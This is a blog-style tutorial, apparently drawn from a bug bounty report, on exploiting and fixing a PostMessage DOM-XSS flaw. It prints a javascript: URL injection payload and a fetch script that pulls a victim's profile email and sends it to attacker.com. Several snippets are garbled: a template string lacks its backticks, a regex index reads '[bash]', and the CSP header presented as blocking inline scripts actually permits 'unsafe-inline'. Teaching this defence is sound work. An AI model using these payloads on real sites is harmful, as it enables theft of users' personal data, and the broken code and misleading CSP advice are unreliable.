Exploiting DOM-Based XSS: A Real-World Bug Bounty Case Study

Introduction

DOM-Based Cross-Site Scripting (XSS) is a client-side vulnerability where malicious JavaScript executes due to unsafe manipulation of the Document Object Model (DOM). In this article, we dissect a real-world bug bounty submission involving a PostMessage-driven DOM-XSS exploit, including payload crafting, impact analysis, and mitigation strategies.

Learning Objectives

Understand how PostMessage handlers can introduce DOM-XSS vulnerabilities.
Learn to craft exploit payloads to extract PII via XHR requests.
Apply secure coding practices to prevent DOM-XSS in web applications.

1. PostMessage Handler Exploitation

Vulnerable Code Snippet

window.addEventListener('message', (event) => { 
let url = event.data.url; 
document.body.innerHTML += <code><iframe src="${url}"></iframe></code>; 
});

Exploitation Steps

1. Craft Malicious Payload:


<script> 
window.opener.postMessage( 
{url: 'javascript:alert(document.domain)'}, 
'' 
); 
</script>

2. Trigger XSS: The victim’s browser renders the `` with the injected JavaScript, executing arbitrary code.</p> <h2 style="color: yellow;">Impact:</h2> <ul> <li>Attackers can steal PII (emails, phone numbers) via XHR requests to internal endpoints. </li> </ul> <h2 style="color: yellow;">2. Bypassing Cookie Protections</h2> <h2 style="color: yellow;">XHR Payload to Extract PII</h2> <pre data-enlighter-language="bash" class="EnlighterJSRAW"> fetch('/user/profile') .then(response => response.text()) .then(data => { const email = data.match(/email": "(.?)"/)[bash]; fetch('https://attacker.com/log?pii=' + encodeURIComponent(email)); }); </pre> <h2 style="color: yellow;">Step-by-Step:</h2> <ol> <li>The attacker’s XSS payload fetches the victim’s profile page. </li> <li>Regex extracts sensitive data (e.g., email) and exfiltrates it to a remote server. </li> </ol> <h2 style="color: yellow;">Limitations:</h2> <ul> <li>Modern `HttpOnly` and `SameSite` cookies may block session theft, but PII remains exposed. </li> </ul> <h2 style="color: yellow;">3. Mitigation: Secure PostMessage Handlers</h2> <h2 style="color: yellow;">Secure Code Example</h2> <pre data-enlighter-language="bash" class="EnlighterJSRAW"> window.addEventListener('message', (event) => { if (event.origin !== 'https://trusted.com') return; let url = new URL(event.data.url); if (url.hostname === 'trusted.com') { document.body.innerHTML += <code><iframe src="${url}"></iframe></code>; } }); </pre> <h2 style="color: yellow;">Key Fixes:</h2> <ul> <li>Validate `event.origin` to restrict message sources. </li> <li>Sanitize URLs using the `URL` API to prevent `javascript:` scheme injection. </li> </ul> <h2 style="color: yellow;">4. DOM-XSS Prevention with CSP</h2> <h2 style="color: yellow;">Content Security Policy (CSP) Header</h2> <pre data-enlighter-language="bash" class="EnlighterJSRAW"> Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' </pre> <h2 style="color: yellow;">Effectiveness:</h2> <ul> <li>Blocks inline scripts and unauthorized external domains. </li> <li>Requires careful whitelisting (avoid `’unsafe-inline’` in production). </li> </ul> <h2 style="color: yellow;">5. Automated Scanning with DOMInvader</h2> <h2 style="color: yellow;">Burp Suite Command</h2> <pre data-enlighter-language="bash" class="EnlighterJSRAW"> java -jar burpsuite.jar --collaborator-server=your-server.net </pre> <h2 style="color: yellow;">Steps:</h2> <h2 style="color: yellow;">1. Use Burp’s DOMInvader to identify PostMessage sinks.</h2> <h2 style="color: yellow;">2. Inject test payloads to trace DOM modifications.</h2> <h2 style="color: yellow;">What Undercode Say</h2> <ul> <li>Key Takeaway 1: DOM-XSS often lurks in dynamic DOM updates (e.g., <code>innerHTML</code>, <code>postMessage</code>). Even “low-severity” bugs can leak sensitive data. </li> <li>Key Takeaway 2: Defense-in-depth (CSP, origin checks, sanitization) is critical for modern web apps. </li> </ul> <h2 style="color: yellow;">Analysis:</h2> <p>The case highlights how client-side protections (e.g., <code>HttpOnly</code>) alone are insufficient. Developers must audit DOM manipulation sinks and adopt secure coding practices. As Single Page Apps (SPAs) grow, DOM-XSS will remain a top OWASP threat, demanding tools like CSP and SAST integration into CI/CD pipelines.</p> <h2 style="color: yellow;">Prediction</h2> <p>DOM-XSS vulnerabilities will surge with increased adoption of WebAssembly and dynamic JS frameworks. Future exploits may combine DOM-XSS with WebSocket hijacking for real-time data theft, pushing for stricter CSP policies and runtime protection tools.</p> <h2 style="color: yellow;">For hands-on training, explore:</h2> <ul> <li><a href="https://portswigger.net/web-security/dom-based" target="_blank" rel="noopener">PortSwigger’s DOM-XSS Labs</a> </li> <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html" target="_blank" rel="noopener">OWASP PostMessage Security Guide</a></li> </ul> <h2 style="color: yellow;">IT/Security Reporter URL:</h2> <p>Reported By: <a href="https://www.linkedin.com/posts/abdelmonsef-sobhy-58542a1a7_%D8%A7%D9%84%D8%B3%D9%84%D8%A7%D9%85-%D8%B9%D9%84%D9%8A%D9%83%D9%85-%D9%88%D8%B1%D8%AD%D9%85%D8%A9-%D8%A7%D9%84%D9%84%D9%87-%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87-i-discovered-activity-7344371218826891265-XhfN" target="_blank" rel="noopener">Abdelmonsef Sobhy</a> – Hackers Feeds<br /> Extra Hub: Undercode MoN<br /> Basic Verification: Pass ✅</p> <h2 style="color: yellow;">Join Our Cyber World:</h2> <p><a href="https://undercode.help/whatsapp" target="_blank" rel="noopener">💬 Whatsapp</a> | <a href="https://t.me/UndercodeCommunity">💬 Telegram</a></p> </div> </div> </article> <nav class="navigation post-navigation" aria-label="Posts"> <div class="nav-links"><div class="nav-previous"><a title="Sophos 2025 State of Ransomware Report: Key Insights and Mitigation Strategies" href="https://undercodetesting.com/sophos-2025-state-of-ransomware-report-key-insights-and-mitigation-strategies/" rel="prev"><span class="ast-post-nav" aria-hidden="true"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M134.059 296H436c6.627 0 12-5.373 12-12v-56c0-6.627-5.373-12-12-12H134.059v-46.059c0-21.382-25.851-32.09-40.971-16.971L7.029 239.029c-9.373 9.373-9.373 24.569 0 33.941l86.059 86.059c15.119 15.119 40.971 4.411 40.971-16.971V296z'></path></svg></span> Previous</span> <p> Sophos 2025 State of Ransomware Report: Key Insights and Mitigation Strategies </p></a></div><div class="nav-next"><a title="Top 8 API Architecture Styles Every Developer Should Know" href="https://undercodetesting.com/top-8-api-architecture-styles-every-developer-should-know/" rel="next"><span class="ast-post-nav" aria-hidden="true">Next <span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M313.941 216H12c-6.627 0-12 5.373-12 12v56c0 6.627 5.373 12 12 12h301.941v46.059c0 21.382 25.851 32.09 40.971 16.971l86.059-86.059c9.373-9.373 9.373-24.569 0-33.941l-86.059-86.059c-15.119-15.119-40.971-4.411-40.971 16.971V216z'></path></svg></span></span> <p> Top 8 API Architecture Styles Every Developer Should Know </p></a></div></div> </nav><div class="ast-single-related-posts-container ast-container--"><div class="ast-related-posts-title-section"> <h2 class="ast-related-posts-title"> Related Posts: </h2> </div><div class="ast-related-posts-wrapper"> <article class="ast-related-post post-49 post type-post status-publish format-standard has-post-thumbnail hentry category-updates"> <div class="ast-related-posts-inner-section"> <div class="ast-related-post-content"> <div class="ast-related-post-featured-section post-has-thumb"><div class="post-thumb-img-content post-thumb"><a aria-label="Read more about Master Kubernetes YAML with Our Comprehensive Guide" href="https://undercodetesting.com/master-kubernetes-yaml-with-our-comprehensive-guide/"><img width="300" height="180" src="https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_WWDX9bkXUXcH_response-300x180.jpeg" class="attachment-medium size-medium wp-post-image" alt="Master Kubernetes YAML with Our Comprehensive Guide" itemprop="" decoding="async" srcset="https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_WWDX9bkXUXcH_response-300x180.jpeg 300w, https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_WWDX9bkXUXcH_response.jpeg 626w" sizes="(max-width: 300px) 100vw, 300px" /></a> </div></div> <header class="entry-header related-entry-header"> <h3 class="ast-related-post-title entry-title"> <a href="https://undercodetesting.com/master-kubernetes-yaml-with-our-comprehensive-guide/" target="_self" rel="bookmark noopener noreferrer">Master Kubernetes YAML with Our Comprehensive Guide</a> </h3> <div class="entry-meta ast-related-cat-style--none ast-related-tag-style--none"> <span class="comments-link"> <a href="https://undercodetesting.com/master-kubernetes-yaml-with-our-comprehensive-guide/#respond">Leave a Comment</a> </span> / <span class="ast-taxonomy-container cat-links default"><a href="https://undercodetesting.com/category/updates/" rel="category tag">updates</a></span> / By <span class="posted-by vcard author" itemtype="https://schema.org/Person" itemscope="itemscope" itemprop="author"> <a title="View all posts by Tony Moukbel" href="https://undercodetesting.com/author/tonymoukbel/" rel="author" class="url fn n" itemprop="url" > <span class="author-name" itemprop="name" > Tony Moukbel </span> </a> </span> </div> </header> <div class="entry-content clear"> </div> </div> </div> </article> <article class="ast-related-post post-53 post type-post status-publish format-standard has-post-thumbnail hentry category-updates"> <div class="ast-related-posts-inner-section"> <div class="ast-related-post-content"> <div class="ast-related-post-featured-section post-has-thumb"><div class="post-thumb-img-content post-thumb"><a aria-label="Read more about How to Configure Folder Redirection for Enhanced Data Security" href="https://undercodetesting.com/how-to-configure-folder-redirection-for-enhanced-data-security/"><img width="300" height="180" src="https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_ByjQzAQkWLmW_response-300x180.jpeg" class="attachment-medium size-medium wp-post-image" alt="How to Configure Folder Redirection for Enhanced Data Security" itemprop="" decoding="async" srcset="https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_ByjQzAQkWLmW_response-300x180.jpeg 300w, https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_ByjQzAQkWLmW_response.jpeg 626w" sizes="(max-width: 300px) 100vw, 300px" /></a> </div></div> <header class="entry-header related-entry-header"> <h3 class="ast-related-post-title entry-title"> <a href="https://undercodetesting.com/how-to-configure-folder-redirection-for-enhanced-data-security/" target="_self" rel="bookmark noopener noreferrer">How to Configure Folder Redirection for Enhanced Data Security</a> </h3> <div class="entry-meta ast-related-cat-style--none ast-related-tag-style--none"> <span class="comments-link"> <a href="https://undercodetesting.com/how-to-configure-folder-redirection-for-enhanced-data-security/#respond">Leave a Comment</a> </span> / <span class="ast-taxonomy-container cat-links default"><a href="https://undercodetesting.com/category/updates/" rel="category tag">updates</a></span> / By <span class="posted-by vcard author" itemtype="https://schema.org/Person" itemscope="itemscope" itemprop="author"> <a title="View all posts by Tony Moukbel" href="https://undercodetesting.com/author/tonymoukbel/" rel="author" class="url fn n" itemprop="url" > <span class="author-name" itemprop="name" > Tony Moukbel </span> </a> </span> </div> </header> <div class="entry-content clear"> </div> </div> </div> </article> <article class="ast-related-post post-145 post type-post status-publish format-standard has-post-thumbnail hentry category-updates"> <div class="ast-related-posts-inner-section"> <div class="ast-related-post-content"> <div class="ast-related-post-featured-section post-has-thumb"><div class="post-thumb-img-content post-thumb"><a aria-label="Read more about 5 Effective and Efficient Projects for Creating a Cloud Environment Using Open Source Tools" href="https://undercodetesting.com/5-effective-and-efficient-projects-for-creating-a-cloud-environment-using-open-source-tools-2/"><img width="300" height="300" src="https://undercodetesting.com/wp-content/uploads/2025/01/3sX6bF6UhDRh_response-300x300.jpeg" class="attachment-medium size-medium wp-post-image" alt="5 Effective and Efficient Projects for Creating a Cloud Environment Using Open Source Tools" itemprop="" decoding="async" srcset="https://undercodetesting.com/wp-content/uploads/2025/01/3sX6bF6UhDRh_response-300x300.jpeg 300w, https://undercodetesting.com/wp-content/uploads/2025/01/3sX6bF6UhDRh_response-150x150.jpeg 150w, https://undercodetesting.com/wp-content/uploads/2025/01/3sX6bF6UhDRh_response-768x768.jpeg 768w, https://undercodetesting.com/wp-content/uploads/2025/01/3sX6bF6UhDRh_response.jpeg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a> </div></div> <header class="entry-header related-entry-header"> <h3 class="ast-related-post-title entry-title"> <a href="https://undercodetesting.com/5-effective-and-efficient-projects-for-creating-a-cloud-environment-using-open-source-tools-2/" target="_self" rel="bookmark noopener noreferrer">5 Effective and Efficient Projects for Creating a Cloud Environment Using Open Source Tools</a> </h3> <div class="entry-meta ast-related-cat-style--none ast-related-tag-style--none"> <span class="comments-link"> <a href="https://undercodetesting.com/5-effective-and-efficient-projects-for-creating-a-cloud-environment-using-open-source-tools-2/#respond">Leave a Comment</a> </span> / <span class="ast-taxonomy-container cat-links default"><a href="https://undercodetesting.com/category/updates/" rel="category tag">updates</a></span> / By <span class="posted-by vcard author" itemtype="https://schema.org/Person" itemscope="itemscope" itemprop="author"> <a title="View all posts by Tony Moukbel" href="https://undercodetesting.com/author/tonymoukbel/" rel="author" class="url fn n" itemprop="url" > <span class="author-name" itemprop="name" > Tony Moukbel </span> </a> </span> </div> </header> <div class="entry-content clear"> </div> </div> </div> </article> </div> </div> </main> </div> </div>  </div> <footer class="site-footer" id="colophon" itemtype="https://schema.org/WPFooter" itemscope="itemscope" itemid="#colophon"> <div class="site-primary-footer-wrap ast-builder-grid-row-container site-footer-focus-item ast-builder-grid-row-3-equal ast-builder-grid-row-tablet-3-equal ast-builder-grid-row-mobile-full ast-footer-row-stack ast-footer-row-tablet-stack ast-footer-row-mobile-stack" data-section="section-primary-footer-builder"> <div class="ast-builder-grid-row-container-inner"> <div class="ast-builder-footer-grid-columns site-primary-footer-inner-wrap ast-builder-grid-row"> <div class="site-footer-primary-section-1 site-footer-section site-footer-section-1"> <div class="footer-widget-area widget-area site-footer-focus-item" data-section="section-footer-menu"> <div class="footer-bar-navigation"><nav class="site-navigation ast-flex-grow-1 navigation-accessibility footer-navigation" id="footer-site-navigation" aria-label="Site Navigation: fm" itemtype="https://schema.org/SiteNavigationElement" itemscope="itemscope"><div class="footer-nav-wrap"><ul id="astra-footer-menu" class="ast-nav-menu ast-flex astra-footer-vertical-menu astra-footer-tablet-vertical-menu astra-footer-mobile-vertical-menu"><li id="menu-item-27819" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-27819"><a rel="privacy-policy" href="https://undercodetesting.com/privacy-policy/" class="menu-link">Privacy Policy & Cookie Policy</a></li> <li id="menu-item-27820" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27820"><a href="http://undercode.help/training" class="menu-link">Training & Certifications</a></li> <li id="menu-item-27821" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27821"><a href="http://undercode.help" class="menu-link">Official Website</a></li> <li id="menu-item-27822" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27822"><a href="http://undercode.help/community" class="menu-link">Community</a></li> </ul></div></nav></div> </div> </div> <div class="site-footer-primary-section-2 site-footer-section site-footer-section-2"> <aside class="footer-widget-area widget-area site-footer-focus-item footer-widget-area-inner" data-section="sidebar-widgets-footer-widget-1" aria-label="Footer Widget 1" role="region" > <section id="block-11" class="widget widget_block"><p><div class="gtranslate_wrapper" id="gt-wrapper-50526273"></div></p> </section> </aside> </div> <div class="site-footer-primary-section-3 site-footer-section site-footer-section-3"> </div> </div> </div> </div> <div class="site-below-footer-wrap ast-builder-grid-row-container site-footer-focus-item ast-builder-grid-row-full ast-builder-grid-row-tablet-full ast-builder-grid-row-mobile-full ast-footer-row-stack ast-footer-row-tablet-stack ast-footer-row-mobile-stack" data-section="section-below-footer-builder"> <div class="ast-builder-grid-row-container-inner"> <div class="ast-builder-footer-grid-columns site-below-footer-inner-wrap ast-builder-grid-row"> <div class="site-footer-below-section-1 site-footer-section site-footer-section-1"> <div class="ast-builder-layout-element ast-flex site-footer-focus-item" data-section="section-fb-social-icons-1"> <div class="ast-footer-social-1-wrap ast-footer-social-wrap"><div class="footer-social-inner-wrap element-social-inner-wrap social-show-label-true ast-social-color-type-custom ast-social-stack-none ast-social-element-style-filled"><a href="https://www.facebook.com/groups/undercodetesting" aria-label="Facebook" target="_blank" rel="noopener noreferrer" style="--color: #557dbc; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-facebook footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 320 512'><path d='M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z'></path></svg></span><span class="social-item-label">Facebook</span></a><a href="http://https//x.com/undercodeupdate" aria-label="X" target="_blank" rel="noopener noreferrer" style="--color: #7acdee; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-twitter footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'><path d='M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z'></path></svg></span><span class="social-item-label">X</span></a><a href="https://instagram.com/undercodetesting" aria-label="Instagram" target="_blank" rel="noopener noreferrer" style="--color: #8a3ab9; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-instagram footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M224.1 141c-63.6 0-114.9 51.3-114.9 114.9s51.3 114.9 114.9 114.9S339 319.5 339 255.9 287.7 141 224.1 141zm0 189.6c-41.1 0-74.7-33.5-74.7-74.7s33.5-74.7 74.7-74.7 74.7 33.5 74.7 74.7-33.6 74.7-74.7 74.7zm146.4-194.3c0 14.9-12 26.8-26.8 26.8-14.9 0-26.8-12-26.8-26.8s12-26.8 26.8-26.8 26.8 12 26.8 26.8zm76.1 27.2c-1.7-35.9-9.9-67.7-36.2-93.9-26.2-26.2-58-34.4-93.9-36.2-37-2.1-147.9-2.1-184.9 0-35.8 1.7-67.6 9.9-93.9 36.1s-34.4 58-36.2 93.9c-2.1 37-2.1 147.9 0 184.9 1.7 35.9 9.9 67.7 36.2 93.9s58 34.4 93.9 36.2c37 2.1 147.9 2.1 184.9 0 35.9-1.7 67.7-9.9 93.9-36.2 26.2-26.2 34.4-58 36.2-93.9 2.1-37 2.1-147.8 0-184.8zM398.8 388c-7.8 19.6-22.9 34.7-42.6 42.6-29.5 11.7-99.5 9-132.1 9s-102.7 2.6-132.1-9c-19.6-7.8-34.7-22.9-42.6-42.6-11.7-29.5-9-99.5-9-132.1s-2.6-102.7 9-132.1c7.8-19.6 22.9-34.7 42.6-42.6 29.5-11.7 99.5-9 132.1-9s102.7-2.6 132.1 9c19.6 7.8 34.7 22.9 42.6 42.6 11.7 29.5 9 99.5 9 132.1s2.7 102.7-9 132.1z'></path></svg></span><span class="social-item-label">Instagram</span></a><a href="https://Linkedin.com/in/Undercodetesting" aria-label="Linkedin" target="_blank" rel="noopener noreferrer" style="--color: #1285fe; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-bluesky footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z'></path></svg></span><span class="social-item-label">Linkedin</span></a><a href="http://t.me/Undercode_Testing" aria-label="Telegram" target="_blank" rel="noopener noreferrer" style="--color: #1B64F6; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-behance footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M446.7 98.6l-67.6 318.8c-5.1 22.5-18.4 28.1-37.3 17.5l-103-75.9-49.7 47.8c-5.5 5.5-10.1 10.1-20.7 10.1l7.4-104.9 190.9-172.5c8.3-7.4-1.8-11.5-12.9-4.1L117.8 284 16.2 252.2c-22.1-6.9-22.5-22.1 4.6-32.7L418.2 66.4c18.4-6.9 34.5 4.1 28.5 32.2z'></path></svg></span><span class="social-item-label">Telegram</span></a><a href="https://chat.whatsapp.com/He7HQoHxaIv2S1h7KoEXdw" aria-label="Whatsapp" target="_blank" rel="noopener noreferrer" style="--color: #d77ea6; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-dribbble footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M380.9 97.1C339 55.1 283.2 32 223.9 32c-122.4 0-222 99.6-222 222 0 39.1 10.2 77.3 29.6 111L0 480l117.7-30.9c32.4 17.7 68.9 27 106.1 27h.1c122.3 0 224.1-99.6 224.1-222 0-59.3-25.2-115-67.1-157zm-157 341.6c-33.2 0-65.7-8.9-94-25.7l-6.7-4-69.8 18.3L72 359.2l-4.4-7c-18.5-29.4-28.2-63.3-28.2-98.2 0-101.7 82.8-184.5 184.6-184.5 49.3 0 95.6 19.2 130.4 54.1 34.8 34.9 56.2 81.2 56.1 130.5 0 101.8-84.9 184.6-186.6 184.6zm101.2-138.2c-5.5-2.8-32.8-16.2-37.9-18-5.1-1.9-8.8-2.8-12.5 2.8-3.7 5.6-14.3 18-17.6 21.8-3.2 3.7-6.5 4.2-12 1.4-32.6-16.3-54-29.1-75.5-66-5.7-9.8 5.7-9.1 16.3-30.3 1.8-3.7.9-6.9-.5-9.7-1.4-2.8-12.5-30.1-17.1-41.2-4.5-10.8-9.1-9.3-12.5-9.5-3.2-.2-6.9-.2-10.6-.2-3.7 0-9.7 1.4-14.8 6.9-5.1 5.6-19.4 19-19.4 46.3 0 27.3 19.9 53.7 22.6 57.4 2.8 3.7 39.1 59.7 94.8 83.8 35.2 15.2 49 16.5 66.6 13.9 10.7-1.6 32.8-13.4 37.4-26.4 4.6-13 4.6-24.1 3.2-26.4-1.3-2.5-5-3.9-10.5-6.6z'></path></svg></span><span class="social-item-label">Whatsapp</span></a></div></div> </div> <div class="footer-widget-area widget-area site-footer-focus-item ast-footer-html-1" data-section="section-fb-html-1"> <div class="ast-header-html inner-link-style-"><div class="ast-builder-html-element"><p>© 2016-2025 <a href="http://undercode.help">Undercode</a>. All rights reserved.</p> </div></div> </div> </div> </div> </div> </div> </footer> </div> <script type="speculationrules"> {"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/astra/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]} </script>  <div id="cmplz-cookiebanner-container"><div class="cmplz-cookiebanner cmplz-hidden banner-1 banner-a optin cmplz-bottom cmplz-categories-type-no" aria-modal="true" data-nosnippet="true" role="dialog" aria-live="polite" aria-labelledby="cmplz-header-1-optin" aria-describedby="cmplz-message-1-optin"> <div class="cmplz-header"> <div class="cmplz-logo"></div> <div class="cmplz-title" id="cmplz-header-1-optin">Manage Consent</div> <div class="cmplz-close" tabindex="0" role="button" aria-label="Close dialog"> <svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="times" class="svg-inline--fa fa-times fa-w-11" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 352 512"><path fill="currentColor" d="M242.72 256l100.07-100.07c12.28-12.28 12.28-32.19 0-44.48l-22.24-22.24c-12.28-12.28-32.19-12.28-44.48 0L176 189.28 75.93 89.21c-12.28-12.28-32.19-12.28-44.48 0L9.21 111.45c-12.28 12.28-12.28 32.19 0 44.48L109.28 256 9.21 356.07c-12.28 12.28-12.28 32.19 0 44.48l22.24 22.24c12.28 12.28 32.2 12.28 44.48 0L176 322.72l100.07 100.07c12.28 12.28 32.2 12.28 44.48 0l22.24-22.24c12.28-12.28 12.28-32.19 0-44.48L242.72 256z"></path></svg> </div> </div> <div class="cmplz-divider cmplz-divider-header"></div> <div class="cmplz-body"> <div class="cmplz-message" id="cmplz-message-1-optin"><p>To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent may adversely affect certain features and functions.</p><p><strong>We do not sell your personal data.</strong> If you wish to exercise your rights under applicable privacy laws, please visit our <a href="https://undercodetesting.com/privacy-policy">Do Not Sell My Personal Information</a> page.</p></div>  <div class="cmplz-categories"> <details class="cmplz-category cmplz-functional" > <summary> <span class="cmplz-category-header"> <span class="cmplz-category-title">Functional</span> <span class='cmplz-always-active'> <span class="cmplz-banner-checkbox"> <input type="checkbox" id="cmplz-functional-optin" data-category="cmplz_functional" class="cmplz-consent-checkbox cmplz-functional" size="40" value="1"/> <label class="cmplz-label" for="cmplz-functional-optin"><span class="screen-reader-text">Functional</span></label> </span> Always active </span> <span class="cmplz-icon cmplz-open"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" height="18" ><path d="M224 416c-8.188 0-16.38-3.125-22.62-9.375l-192-192c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L224 338.8l169.4-169.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-192 192C240.4 412.9 232.2 416 224 416z"/></svg> </span> </span> </summary> <div class="cmplz-description"> <span class="cmplz-description-functional">The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.</span> </div> </details> <details class="cmplz-category cmplz-preferences" > <summary> <span class="cmplz-category-header"> <span class="cmplz-category-title">Preferences</span> <span class="cmplz-banner-checkbox"> <input type="checkbox" id="cmplz-preferences-optin" data-category="cmplz_preferences" class="cmplz-consent-checkbox cmplz-preferences" size="40" value="1"/> <label class="cmplz-label" for="cmplz-preferences-optin"><span class="screen-reader-text">Preferences</span></label> </span> <span class="cmplz-icon cmplz-open"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" height="18" ><path d="M224 416c-8.188 0-16.38-3.125-22.62-9.375l-192-192c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L224 338.8l169.4-169.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-192 192C240.4 412.9 232.2 416 224 416z"/></svg> </span> </span> </summary> <div class="cmplz-description"> <span class="cmplz-description-preferences">The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.</span> </div> </details> <details class="cmplz-category cmplz-statistics" > <summary> <span class="cmplz-category-header"> <span class="cmplz-category-title">Statistics</span> <span class="cmplz-banner-checkbox"> <input type="checkbox" id="cmplz-statistics-optin" data-category="cmplz_statistics" class="cmplz-consent-checkbox cmplz-statistics" size="40" value="1"/> <label class="cmplz-label" for="cmplz-statistics-optin"><span class="screen-reader-text">Statistics</span></label> </span> <span class="cmplz-icon cmplz-open"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" height="18" ><path d="M224 416c-8.188 0-16.38-3.125-22.62-9.375l-192-192c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L224 338.8l169.4-169.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-192 192C240.4 412.9 232.2 416 224 416z"/></svg> </span> </span> </summary> <div class="cmplz-description"> <span class="cmplz-description-statistics">The technical storage or access that is used exclusively for statistical purposes.</span> <span class="cmplz-description-statistics-anonymous">The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.</span> </div> </details> <details class="cmplz-category cmplz-marketing" > <summary> <span class="cmplz-category-header"> <span class="cmplz-category-title">Marketing</span> <span class="cmplz-banner-checkbox"> <input type="checkbox" id="cmplz-marketing-optin" data-category="cmplz_marketing" class="cmplz-consent-checkbox cmplz-marketing" size="40" value="1"/> <label class="cmplz-label" for="cmplz-marketing-optin"><span class="screen-reader-text">Marketing</span></label> </span> <span class="cmplz-icon cmplz-open"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" height="18" ><path d="M224 416c-8.188 0-16.38-3.125-22.62-9.375l-192-192c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L224 338.8l169.4-169.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-192 192C240.4 412.9 232.2 416 224 416z"/></svg> </span> </span> </summary> <div class="cmplz-description"> <span class="cmplz-description-marketing">The technical 